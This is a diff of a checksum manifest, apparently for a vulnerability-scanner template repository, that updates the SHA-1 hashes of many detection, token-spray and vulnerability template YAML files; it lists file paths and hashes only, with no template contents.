http/technologies/xerox-workcentre-detect.yaml:a97be47faf14f11c1a748e52e77bf09061641a40 http/technologies/yapi-detect.yaml:169e7885a0dcfb6e0b28d8e8edc750f8dddfd534 -http/technologies/yeswiki-detect.yaml:bf55b8100fa202e52cf2a06acef4a708127c558a +http/technologies/yeswiki-detect.yaml:090bedc89e3f7d42a48466005f02a5d7a7604b5c http/technologies/ymhome-detect.yaml:6fe2448d2aa364e91aea5c7948489857d22a253d http/technologies/zap-api-detect.yaml:4f1955930b8c2bc2f878f9c7b858ec42960a9900 http/technologies/zend-server-test-page.yaml:5d873242707c773958c3c75b940d1f83e15bdd59 @@ -5669,7 +5669,7 @@ http/token-spray/api-bitquery.yaml:b391a722e8d9a84f3d8e08d8a855d0320e2e9ade http/token-spray/api-bitrise.yaml:3148dfd34f387386b54a713010ec6a633b84c1e6 http/token-spray/api-blitapp.yaml:02e1939b2579160e966a5c139eed72f38913a6ba http/token-spray/api-block.yaml:87dddf4ceb242f1a4c97e6ed5d28057b75442549 -http/token-spray/api-blockchain.yaml:ebf448e78d5709a404c16349748d5a6795337aa8 +http/token-spray/api-blockchain.yaml:8a60c1ef9d28ee0c623c3b3d9947d58414d7d22e http/token-spray/api-blockfrost.yaml:12ce75152c5bb7cec326f69c0db1b35831c9132f http/token-spray/api-box.yaml:40232a8dc1e3bc76cf4a06fa7fc8b3a489740e5b http/token-spray/api-bravenewcoin.yaml:6058a8b40ac9a6e1c7cc6b4bb1f1789f100159d7 @@ -5833,7 +5833,7 @@ http/token-spray/api-trello.yaml:8f0bc3fc3654cda06eaa156b8252807484593ec6 http/token-spray/api-twitter.yaml:d47d3d3a86d8773243086f5111b5f55d918bdb16 http/token-spray/api-urlscan.yaml:90fd9b949d5a37f1a4ff23d4067715f447b27a64 http/token-spray/api-userstack.yaml:36591b2e33d6a58608c825ac54fd619c8e6416d4 -http/token-spray/api-vercel.yaml:593f0a68c7c318acbcb83cbefa9079f31b0e8781 +http/token-spray/api-vercel.yaml:9b544b60ddc2351520fb7436d4cec5bfcf87d093 http/token-spray/api-virustotal.yaml:b00132053f310a834c2113e26945ed5af9211608 http/token-spray/api-visualstudio.yaml:383cf5d7e883cd6654ddd05cb07d8d61800f7d8e http/token-spray/api-wakatime.yaml:8707e54c9c662dd1d9a9f7c6f9b38af87ce3ab70 @@ -5872,75 +5872,75 @@ http/token-spray/google-timezone.yaml:cca63d4d4bbdda1323d847bdc439b422c7c3f48d http/token-spray/googlet-extsearchplaces.yaml:251a88a71f99e2cfc6458796474815aa4868c6c5 http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml:34a7ec43771dc6c47156dd140e6996fe06fd97d8 http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:3b540fa71bb5f1285e53a2839da091c67d507ec9 -http/vulnerabilities/apache/apache-flink-unauth-rce.yaml:4711ebfd929286482d2d30c7abc70d0f68f9c866 -http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:a9597dde42dfbb2ddd3680f7ec3e7c477d57dca6 -http/vulnerabilities/apache/apache-solr-file-read.yaml:d2c47f028f2e13278bb146309477dca17ffeaf48 +http/vulnerabilities/apache/apache-flink-unauth-rce.yaml:96ff48b521213025381812cce847e9a371da27a6 +http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:96ce502f6b9d7f1f131498e3f225fc3c2608df10 +http/vulnerabilities/apache/apache-solr-file-read.yaml:bce0b4196fbe888df2acd3476f9a101521edf3a0 http/vulnerabilities/apache/apache-solr-log4j-rce.yaml:dd513584736bcbb882c43c42bdd7e8e76a75f335 -http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml:98b2f9e6cc4e14ce3761f624b11e7281c24cf93c +http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml:016c67584e63621567a8135963eddfd5d4e1cd2f http/vulnerabilities/avaya/avaya-aura-rce.yaml:466178ea56b8d3903a543b36ba0003e6b2fb3019 -http/vulnerabilities/avaya/avaya-aura-xss.yaml:6f8c48fcfd4df00eb72f5b06de45c783b2730ad0 +http/vulnerabilities/avaya/avaya-aura-xss.yaml:99078546cdb0633a3ba2b3089a62d50c87ddd43d http/vulnerabilities/avtech/avtech-auth-bypass.yaml:c5ba6599c40cb26dea65065261d072e6f5083373 http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml:d2c2b49be9bad9fd0753c090a86c4aa18e73e76a http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:15e280ee1d7344056e946fd7f25420ab1346992f http/vulnerabilities/avtech/avtech-verification-bypass.yaml:9497012b89ada0ee6f48be0af32ef2033ec8a47a -http/vulnerabilities/backdoor/jexboss-backdoor.yaml:cb6423774f8f65d84e48cea074a8b4bca7efdafb -http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml:33ea1c079427978a64a5ed9817e0f957d051158a -http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:46a8938a942cc80f2270acfce933e2051ee32628 -http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:5b6db3965a6cf77e625dc635f7a90cc8a6dd52af +http/vulnerabilities/backdoor/jexboss-backdoor.yaml:2b4e3596c572a9d4429e1f23d90251d082d0fc89 +http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml:3a75f5998ce89d991b9f5cd437c41147d240101c +http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:09bea77ff5805735da061d4eda952e5bbef2a325 +http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:55254421824bd2f4010e3ca1392968381e0b53eb http/vulnerabilities/cisco/cucm-username-enumeration.yaml:243ce2fe32405c9d5cbd69e97d0d076aa9b7e380 -http/vulnerabilities/code42/code42-log4j-rce.yaml:e18ed0b0f26d60457a78a831dee032ec17674d46 -http/vulnerabilities/concrete/concrete-xss.yaml:2343d3ad37bc9c86d713e2204e3fc1dcdcbee407 -http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:199c11865c0d2a6e422031eb08eeb92d394e941e +http/vulnerabilities/code42/code42-log4j-rce.yaml:2fa740a72c42d43a781343641b51ea752a339573 +http/vulnerabilities/concrete/concrete-xss.yaml:5c74a4c209709ab941b1df34e00672aa4d624edb +http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:94e59ce09c6f7a5b757bcb275f9fba3b4f350441 http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml:620f9d28007c42f54ed76141e370e5158d667055 -http/vulnerabilities/dedecms/dedecms-config-xss.yaml:cec054c93c3decee6d1a1dac6997f2240e5ba486 -http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml:3d8e98938a399d807ac46bae9da83d605165ff72 -http/vulnerabilities/dedecms/dedecms-openredirect.yaml:0b976a4e2a09ea1bda8bdc3b01de76a78be37458 -http/vulnerabilities/dedecms/dedecms-rce.yaml:debc4473dd49df86d5541f86fb46acc0e682d342 -http/vulnerabilities/deos-open500-admin.yaml:d035cea7926e4d48ccc082af502cadbae7ad66a0 -http/vulnerabilities/drupal/drupal-avatar-xss.yaml:66c4ce824510e0cb23f9544344503cd6ba4b4df0 -http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:915f6f21efecda1907bdb8d9d47a46d09bbfd22e -http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:12215a2bd04887ded28f5b3a18a9de4f969a5a39 -http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml:9af268c7403efb8455f954084a8fe32fe283774f -http/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml:3d4769b88cc33b95b08059d8412b21b45bc93262 -http/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml:74f7885985969c988a9f099d703f31b02424e7c4 -http/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml:052243972824ca8c870a34ca72b5f98432f7fed7 -http/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml:72cb2d2389d037e0b084632070ec8a14ee7ccc80 -http/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml:02291a4a2affbf433610af24c0aadeece84bbddf -http/vulnerabilities/froxlor-xss.yaml:171cad2e2fe82686b5743a0bca4904df72829d6f -http/vulnerabilities/generic/basic-xss-prober.yaml:b23c58960ae10786fe30793d839fd2136dd782cf +http/vulnerabilities/dedecms/dedecms-config-xss.yaml:16b7ffa61db6c0e6b550a9fdf0bf385085005d7f +http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml:079f7c526b753b2eff94ca66ba8a8b4571dc2682 +http/vulnerabilities/dedecms/dedecms-openredirect.yaml:d18f0f25b3f707f155997fc3a110916a5dcc5eeb +http/vulnerabilities/dedecms/dedecms-rce.yaml:a8cd8335a29316ab09cd3261656db490f9671636 +http/vulnerabilities/deos-open500-admin.yaml:63ac4937a413f49d1505817f8e9fc0511f63b9c3 +http/vulnerabilities/drupal/drupal-avatar-xss.yaml:9209fbd5943d02081ba5021aacb2ad48a2435efe +http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:ef76ddb5d08455550aed9bf6374b498336f70676 +http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:bb939ed5879a96bfe1d7a21002713721b0e0e5e0 +http/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml:7ae63fcdbb5e8a5403099d30118cead12d04babc +http/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml:f18cc3fd8c70955328584fcfffdb89b0564b1049 +http/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml:97524c87c6f456258b240ef55dffec284eabad84 +http/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml:3123c0ccbf7d6fa5d01390ecf2b3c2946a8ec711 +http/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml:6d12b328e38788522b4f70e71eb2f0e395c28f2c +http/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml:b57fc3c2b9c78f76c2b27e0a74b7da9033a7922c +http/vulnerabilities/froxlor-xss.yaml:58a92427997ed2f386565d673898b4221d78b40d +http/vulnerabilities/generic/basic-xss-prober.yaml:0922f19ab6161d6cda99e134d6a1f2a5c0416a85 http/vulnerabilities/generic/cache-poisoning-xss.yaml:f53bd412c10617620c976f43cd79c664586a5dff http/vulnerabilities/generic/cache-poisoning.yaml:8ab72b5fe3a9a325dac673696087b3186c47c7f0 http/vulnerabilities/generic/cors-misconfig.yaml:9c75ee983504ba89c7a853a2aea3241bb0883fa2 -http/vulnerabilities/generic/crlf-injection.yaml:66861070039fe1e4532471506cb10bd2820dfbef -http/vulnerabilities/generic/error-based-sql-injection.yaml:eec4a6a263a6e98ea0fd63f940e6995539857f4b +http/vulnerabilities/generic/crlf-injection.yaml:46fdff237c13e384f3bc9b8cf510408ddda8c3d5 +http/vulnerabilities/generic/error-based-sql-injection.yaml:ea9308142ba8f3ea1045a35addbbf69ee1243266 http/vulnerabilities/generic/generic-blind-xxe.yaml:3afef8ea3750f7306a3f105162c4aafabebf2b0a http/vulnerabilities/generic/generic-env.yaml:195707d7a49267eff487be2c2cb4cdb9ed31837c -http/vulnerabilities/generic/generic-j2ee-lfi.yaml:4aa1ebd50f29a6405fa5916566a0e65b57f56545 -http/vulnerabilities/generic/generic-linux-lfi.yaml:c14980bc549266362db014e84202c5d019fdc357 -http/vulnerabilities/generic/generic-windows-lfi.yaml:f484e6f1cde05b4623273fbc0b0196c41e69eaba +http/vulnerabilities/generic/generic-j2ee-lfi.yaml:4989f660da5c9db02070af7d7a526bc944d68377 +http/vulnerabilities/generic/generic-linux-lfi.yaml:975e2ba937f349d136d798d4c3625ef22812415e +http/vulnerabilities/generic/generic-windows-lfi.yaml:fe723ba34a76dc0572eaf5c85ee5d3bc6d119f46 http/vulnerabilities/generic/host-header-injection.yaml:005be392a7e5b1e8dd7158ca957633b396f00d24 http/vulnerabilities/generic/oob-header-based-interaction.yaml:a1d5a147b07e4d1d34d43af037412d427129c1e0 http/vulnerabilities/generic/oob-param-based-interaction.yaml:e88860f680f67acece0889e7de070b7eb0c4c929 http/vulnerabilities/generic/open-redirect.yaml:53f2e9495bebd7dd4c7db9709b71611dbca1bab3 http/vulnerabilities/generic/request-based-interaction.yaml:02dae1efe4447fab069f106aa788cef5687f2484 -http/vulnerabilities/generic/top-xss-params.yaml:2f7423bc49090d9f33fde1490fd2824f6ae3d191 +http/vulnerabilities/generic/top-xss-params.yaml:c198f6e2faf2c50efefbc1bcf82613126e8b1e61 http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:e16b3f696f9217799fd1c047426b557e2bbc95a6 http/vulnerabilities/gitea/gitea-rce.yaml:c09d1af49db01f834a41014a58fc6f2831a6607b -http/vulnerabilities/gitlab/gitlab-rce.yaml:69ac27dc10ee5a98b5011241b312d4554fa84882 -http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:709b12efdefa0d64fe91f2a26ba9bda19f7d5730 -http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:ba01958bf2ebd081f97638785af89481360284b6 -http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:3240beefccbd71d5f0cf63574a2f4c3743130425 +http/vulnerabilities/gitlab/gitlab-rce.yaml:414b154369c0001daf7591ec3f4e97f8c8bf8040 +http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:d0eaddb5e9f7853e33e4142da1774d7354d526a3 +http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:4856a3fdcaf905c6c950aa805d07ab9babab7361 +http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:ae65ac77244bc9cd054bb989d2cbcb1bcae7ee21 http/vulnerabilities/grafana/grafana-file-read.yaml:b820257cd84b44c3e35b03c743514910c06453ab http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml:83c0a919fc21a55b9fa95bbd5a5ec903d1c9ccb6 -http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:c549b350d2610fdcc44e372a6b5a9d2986d311fe -http/vulnerabilities/httpbin/httpbin-xss.yaml:66a928a2e82aa0a73e70dc5156af20dfd564915e +http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:31a0b694f7eff5a6a56a9049a731ce9da128fc28 +http/vulnerabilities/httpbin/httpbin-xss.yaml:6ffebbd68fa0b4c7490bf266ca69bbd49ffdd56c http/vulnerabilities/huawei/huawei-firewall-lfi.yaml:6ede30c087e76b15a7c9cadd72061b0ab8a5cff7 -http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml:4b356e0a1cc04eb28d8cb12eb1bcb2a9b4580e66 -http/vulnerabilities/ibm/eclipse-help-system-xss.yaml:a30592cfcc4ffd7d47c5adafa0f136348bf1fa09 -http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml:af87aacb874c2f84e6ac6bfde47cb3f13947368f -http/vulnerabilities/j2ee/liferay-resource-leak.yaml:dd84f56af773b44707457145f52181fb40268252 +http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml:31a5bf395dc244bddca2d44ee7dbe9a1e5ba5e26 +http/vulnerabilities/ibm/eclipse-help-system-xss.yaml:e72f3ddcc4b18672bc998cce72be1519f89a169a +http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml:35657eefb0a4d23b730c4d84a02a2dc47b73db4a +http/vulnerabilities/j2ee/liferay-resource-leak.yaml:99ad298614491e2cd03d4489a341521341732b84 http/vulnerabilities/jamf/jamf-blind-xxe.yaml:cc45e2ff5e348a6e75bed81defa433ea4b3ddb03 -http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:0b5b44f9edccc83c6fb3294b2212cfb5446296c8 +http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:d91b6291bd3215b36aa5be85f3e1d631a08e0914 http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:115bf12effacf7906cfb494ace1b1f94ef094342 http/vulnerabilities/jenkins/jenkins-script.yaml:6001f5d11381e9697539532f4fb76c573a4ea62a http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:85dac33b39769c656a9bc46a0b179004e4e464bf @@ -5955,396 +5955,396 @@ http/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml:2c518a580f881d8c http/vulnerabilities/jira/jira-unauthenticated-screens.yaml:cb84bd816e411ccabe0b240da3f406e8521caa07 http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml:8751cd9b769aa5cee9312c5a20d1a2d28d00e195 http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml:9d83d3d1e9839cd45bb507acf04d5411b6bd65cf -http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:b5f46181f7b11afdd7cc759db25641d979a5fa55 -http/vulnerabilities/joomla/rusty-joomla.yaml:76f06e5c2b46da8f788aae181896f4c183561a4c +http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:9b35d1764a2220c1e4640f8ea0ffcecbe31b57d2 +http/vulnerabilities/joomla/rusty-joomla.yaml:243d584db6ce05f2d2e43b09daa10eae5ff6a085 http/vulnerabilities/kkfileview-ssrf.yaml:c92bd9cba0f534f2ce8e06e6a2e12b8661a9ddab -http/vulnerabilities/laravel/laravel-ignition-xss.yaml:fd56462c0bdacebacebb940221b72661268ccc64 +http/vulnerabilities/laravel/laravel-ignition-xss.yaml:3614ef96120a5f5e31ef5d9ab8034ad6fec63610 http/vulnerabilities/linkerd/linkerd-ssrf.yaml:dfe6bc7b2dbed477b9e577df220cd814551e11c3 http/vulnerabilities/magento/magento-2-exposed-api.yaml:a6ca4bb40cabe0e7a896f24484575ca0ec8a0ab8 http/vulnerabilities/magento/magento-cacheleak.yaml:b614fcd0b0eb5ce758b424df900143bcbaf2aecb http/vulnerabilities/magento/magento-unprotected-dev-files.yaml:a180ef9cc5d33db45fc730145a79bb3753a63620 -http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml:9a5d9b23a4b1a9b2e8c3f0a933f49d4b92a921d9 -http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml:770ca55e859c67560be971eaa3e529c2972f9675 -http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml:da241fa03735489b0f0e22030941742dfa0d7184 -http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml:f969842379003830df45de48c0432b0549689532 -http/vulnerabilities/moodle/moodle-xss.yaml:53cd626a91405078db0c74e3c962d7440f3caba7 -http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:0152a6db2c0de4d52f40d7ef29b50c0409a168c5 -http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:e73c18f42cccb3e869abe4db68f89d690b10814f +http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml:3942101dabb00f60b4b7f5239efee1d1f84e2b93 +http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml:168f66858b3d0e20f6a509d73b281632e1675ce8 +http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml:d6a9b4d056a672a3775099bb09c116df0cd7e3f9 +http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml:bd20aafab7a73674df1f7c9e5a9aa245604acfcc +http/vulnerabilities/moodle/moodle-xss.yaml:e1bd6593e9607f34bf2bfbdbb66457d8e3414c49 +http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:9e9a31fe009519cd70e31db31439f39402d5efd8 +http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:24bc1d31c3907a2dee1d372bad94baacbd069b7f http/vulnerabilities/nps/nps-auth-bypass.yaml:4d10c4d4199f3e410f50b641926d81ed455c2fb6 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:2477330caa8c6bb865810820b8c929f2d2c93553 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:7974bb44a2dc2a4bf26348240d9bd4e1a2bb73c9 http/vulnerabilities/nuxt/nuxt-js-xss.yaml:131b8cd24bc08a9563bdb809d9f577ead2c82289 -http/vulnerabilities/opencpu/opencpu-rce.yaml:d21d3684b4382240134f40f9063a5108beaa8b67 -http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:4e5dfd356151ac9d738de65add773d534774243a -http/vulnerabilities/oracle/oracle-ebs-xss.yaml:93d6a8ece5459a0e420533db8c01aaf1f21665b0 -http/vulnerabilities/oracle/oracle-siebel-xss.yaml:a2f485d20bd112b2ff81ec604fa4b8ba727d1c17 -http/vulnerabilities/oscommerce/oscommerce-rce.yaml:8440dcb6a1419f1ea3b654af8a830fb0fb7025d7 -http/vulnerabilities/other/3cx-management-console.yaml:2782a541336d5f046d8b72f45e1c812b357d380e -http/vulnerabilities/other/74cms-sqli.yaml:351644ce7369cf65af74024f1ff3dbbe23bb52ef -http/vulnerabilities/other/WSO2-2019-0598.yaml:48b31deda76eb0e9e6329d7dfcc2082d4ed88408 -http/vulnerabilities/other/academy-lms-xss.yaml:b1b03874c3c19c63d061e4c9865e537309f3d0c2 -http/vulnerabilities/other/accent-microcomputers-lfi.yaml:e920bac54afd5ad679db1b1259d696e7548b6a1e -http/vulnerabilities/other/acme-xss.yaml:797c5988efe9404502a38c689711de54c112b6b8 -http/vulnerabilities/other/aerocms-sqli.yaml:72c7345ac15c99879c0df2431038e1c929017ccb -http/vulnerabilities/other/alumni-management-sqli.yaml:08dbca2f0177b503cc8d3bac23420ba0fcd7f61d -http/vulnerabilities/other/antsword-backdoor.yaml:f67bde02d6ecd403d9c3b495cb45547407f309ba -http/vulnerabilities/other/asanhamayesh-lfi.yaml:3842485424491e5e75b68404cacad06b76fd8eed -http/vulnerabilities/other/aspnuke-openredirect.yaml:5ee2870d7030cec26c1610d6171f9519ab167916 -http/vulnerabilities/other/avada-xss.yaml:74d90b5850602465f049e426392c092d42927610 -http/vulnerabilities/other/bems-api-lfi.yaml:e01f224fbf67a5fa39a788a8581a05f3fa511e11 -http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:a06d5dd46b6a536459be16dcbf733dd83f862091 -http/vulnerabilities/other/bitrix-open-redirect.yaml:6f0113de78d452fb4a341006c23d35f63b8c9dcc -http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml:aa0987355d4e0be64da046ce56a7a35a1ef4efc4 +http/vulnerabilities/opencpu/opencpu-rce.yaml:7df7ce07cdedb45a5151ceefd72c585c39b46191 +http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:7062a5a8fd0e96af15b21b4cf4eabcfc25dc3fd8 +http/vulnerabilities/oracle/oracle-ebs-xss.yaml:974ff52625a906f42595b3051a0a7a29ce4b926c +http/vulnerabilities/oracle/oracle-siebel-xss.yaml:1aafe04bab18ffdd65d6cf90fcd6561371133e4b +http/vulnerabilities/oscommerce/oscommerce-rce.yaml:b70754e2c99cbef6387a4f3cbf722edc6e1e178b +http/vulnerabilities/other/3cx-management-console.yaml:2f3401c14b6fc37a7aaec3e50b639bc41045d439 +http/vulnerabilities/other/74cms-sqli.yaml:754351ff81257354118ab3a741ada53d4b0cd414 +http/vulnerabilities/other/WSO2-2019-0598.yaml:df55470aa07ec9e95302b08810aed2034f762dfd +http/vulnerabilities/other/academy-lms-xss.yaml:da37dbfd84f6335eedc3484d58093c08ea08eb91 +http/vulnerabilities/other/accent-microcomputers-lfi.yaml:fb8fd5c58a72fd879efa965d24cac4dcebb158b2 +http/vulnerabilities/other/acme-xss.yaml:b292b0c0d7777a5315f06993a42056b1cb03b27f +http/vulnerabilities/other/aerocms-sqli.yaml:65ddeaac3c3c25208e60dce7e39afeb45ddbc7cc +http/vulnerabilities/other/alumni-management-sqli.yaml:a2e27e994ab7ce79287034c25a3312b5cc7c95db +http/vulnerabilities/other/antsword-backdoor.yaml:93db1ae5508bca36eb0b8805353de90ac653dec2 +http/vulnerabilities/other/asanhamayesh-lfi.yaml:0367c44590e30835f28a54e844817074b2c767ea +http/vulnerabilities/other/aspnuke-openredirect.yaml:ab64189daa0a4907f91b5755fa710adef228f9be +http/vulnerabilities/other/avada-xss.yaml:a87437e1cff6ab3fab62d590aedbe29557192743 +http/vulnerabilities/other/bems-api-lfi.yaml:c634436e12e06ed1871ce7ab0555411c7c1f4bd0 +http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:8cd184ca124b57a8dae72a078c9c00773df884a4 +http/vulnerabilities/other/bitrix-open-redirect.yaml:d07d85523c53212e00bca343aa56c45ae078136d +http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml:d24aadfddb8f1ce687245c78d0b60cfe0511950f http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml:8d97a878f3c1ac1f56fd85ca2867c96288295d95 -http/vulnerabilities/other/bullwark-momentum-lfi.yaml:eaa083dbd811d1e5b28da37af20752efc7448e30 +http/vulnerabilities/other/bullwark-momentum-lfi.yaml:22606c938b8fb8485b10a461ce5f4587dbc7208a http/vulnerabilities/other/cacti-weathermap-file-write.yaml:6addf113956d50c5f2fbe9e749f9f0d1cedfe80c -http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:7aed8bd72c7523de52fa3e9758c151833e056d94 -http/vulnerabilities/other/carrental-xss.yaml:0c44fad01c1d4e64af99945d72a1dea0aa04c970 -http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:58afeb493d09acc7de94967327ff5cb680422d2f -http/vulnerabilities/other/chamilo-lms-sqli.yaml:f19fc77708585fee0a45f9ec5d882829e83d9d24 -http/vulnerabilities/other/chamilo-lms-xss.yaml:8207c6cf7bb7913a0ce35767e4e80c467daa6db5 -http/vulnerabilities/other/ckan-dom-based-xss.yaml:834507d9e630b988a0ebfbbb7539716cd1a3dd22 -http/vulnerabilities/other/coldfusion-debug-xss.yaml:b7cea7b7df83d6e07272b1d6fc8b83eed5b0dbb0 -http/vulnerabilities/other/commax-biometric-auth-bypass.yaml:41526da4746c8ec9caf6f78c82d37fc825430d4d -http/vulnerabilities/other/commax-credentials-disclosure.yaml:d852a81e3efa3ad554c47eff47a3dba0b2c13cd7 -http/vulnerabilities/other/comtrend-password-exposure.yaml:4a1d702347aa91b81ba48181f4be5636edc0b789 -http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml:7336c871aededb9cecb2cccf1bbdc27aa46ebdc7 -http/vulnerabilities/other/couchdb-adminparty.yaml:18ba61f9af3938501f593bf932b98a590a447dc0 -http/vulnerabilities/other/crystal-live-server-lfi.yaml:f83f043b9ba5ba402592a7fcb3a3d2daa42851b3 -http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml:cf2753a4a231ae5d60342ddd4145b8456defb3e5 -http/vulnerabilities/other/cvms-sqli.yaml:ded1b73f04e0ecf70f2e1ee446c6635a80eadb07 -http/vulnerabilities/other/dicoogle-pacs-lfi.yaml:c322706f8987a8ace3872ad4a0e19005a0e05b60 +http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:3dcf74383c04b85913252dc580d34cd1279bcf5c +http/vulnerabilities/other/carrental-xss.yaml:fc983f73ab6338cf00456b96a7397b48f9508ea1 +http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:0845daaee668a666fd26cf380f7f7d7c139415e8 +http/vulnerabilities/other/chamilo-lms-sqli.yaml:5fe0cff3f3f3c852fd14093b5659bc2719360c0e +http/vulnerabilities/other/chamilo-lms-xss.yaml:4c83bd6add9efe5e05240bce3fd0f858d6ed19c3 +http/vulnerabilities/other/ckan-dom-based-xss.yaml:b8b79109f77c1f61d4191f38c32814438d262623 +http/vulnerabilities/other/coldfusion-debug-xss.yaml:e95f8dac229f56be4ae422603ada8b5e586d7c94 +http/vulnerabilities/other/commax-biometric-auth-bypass.yaml:f9ce7cefadd26aaaa56f381810439df363829593 +http/vulnerabilities/other/commax-credentials-disclosure.yaml:0ca9da78f9254620e94a29e437c765ab79173a44 +http/vulnerabilities/other/comtrend-password-exposure.yaml:3096ed8f45dc66d5ee6d359283eb4a5e762bca2c +http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml:a8a8e9f0c5eb5ca3f5a4990aa42f4fe5f1e8bdf1 +http/vulnerabilities/other/couchdb-adminparty.yaml:ff1708137c1bb3dca4a88f69b79a8d3cecc7e4ff +http/vulnerabilities/other/crystal-live-server-lfi.yaml:94926ccb711272e4368c4fad4e4143f267f66188 +http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml:13ab72e4b84a0fb5aa2f419d6e3f95c7d2faa6d7 +http/vulnerabilities/other/cvms-sqli.yaml:f5e5d13c084ca1af7a5921dc46a816cb43aae305 +http/vulnerabilities/other/dicoogle-pacs-lfi.yaml:ee69403745f11b4830303d18a36a148e5b84f7be http/vulnerabilities/other/digital-ocean-ssrf.yaml:2126e78e74f435b98679a45a807d2a7164963497 -http/vulnerabilities/other/digitalrebar-traversal.yaml:13a8ea8497df0cc90c94303307f61d73b0ec49a6 -http/vulnerabilities/other/discourse-xss.yaml:6f86bfc13c4940441f91730f1ff4bee58b8bf2eb -http/vulnerabilities/other/dixell-xweb500-filewrite.yaml:8b193d3b449181d5b05d33d13663cd3958d51acf +http/vulnerabilities/other/digitalrebar-traversal.yaml:83d8932e1ba28d41de8c6de7b6f1829346e0c1b3 +http/vulnerabilities/other/discourse-xss.yaml:2162ffec7b8f22d323d306801f7d60b8acf6909d +http/vulnerabilities/other/dixell-xweb500-filewrite.yaml:208fff5c2c97bf98ce41a2bd8d3c398875535be9 http/vulnerabilities/other/dlink-850L-info-leak.yaml:a872c8a1871928c12b098962789de02e68fa0561 -http/vulnerabilities/other/dotnetcms-sqli.yaml:c699f321f6c18a0370a31e0e229337fb2fff3013 -http/vulnerabilities/other/dss-download-fileread.yaml:a110c8467dd94001182306744ee309ba838ee1bd -http/vulnerabilities/other/duomicms-sql-injection.yaml:cf6eaee5bf8fe4da83bf89d6ec05d2d106c5863a -http/vulnerabilities/other/dzzoffice-xss.yaml:c9325df6eda538e5a395fbdd978119ae531ad955 